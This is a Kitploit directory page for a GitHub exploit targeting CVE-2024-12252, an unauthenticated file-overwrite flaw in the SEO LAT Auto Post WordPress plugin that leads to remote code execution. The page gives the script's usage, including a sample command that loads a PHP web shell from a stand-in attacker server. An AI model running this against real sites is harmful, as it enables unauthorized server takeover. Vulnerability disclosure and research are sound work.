Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-12252 — SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution) | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-12252
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnxploited/cve-2024-12252

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)

View Repository
161 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SEO LAT Auto Post <= 2.2.1 - Remote Code Execution

Description

The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.

Vulnerability Details

  • CVE: CVE-2024-12252
  • CVSS Score: 9.8 (Critical)

Exploitation

This script exploits the vulnerability in the SEO LAT Auto Post plugin to achieve remote code execution by overwriting the seo-beginner-auto-post.php file. The script automates the process of checking the plugin version, triggering the exploit, and providing an interactive shell for executing commands.

Usage

usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL

CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi

options:
-h, --help            show this help message and exit
-u, --url URL         Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
                      Direct URL to your malicious PHP shell

Run the script with the target URL and the URL to your malicious PHP shell:

python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php

References

  • Wordfence Intelligence
  • CVE-2024-12252
Download Tool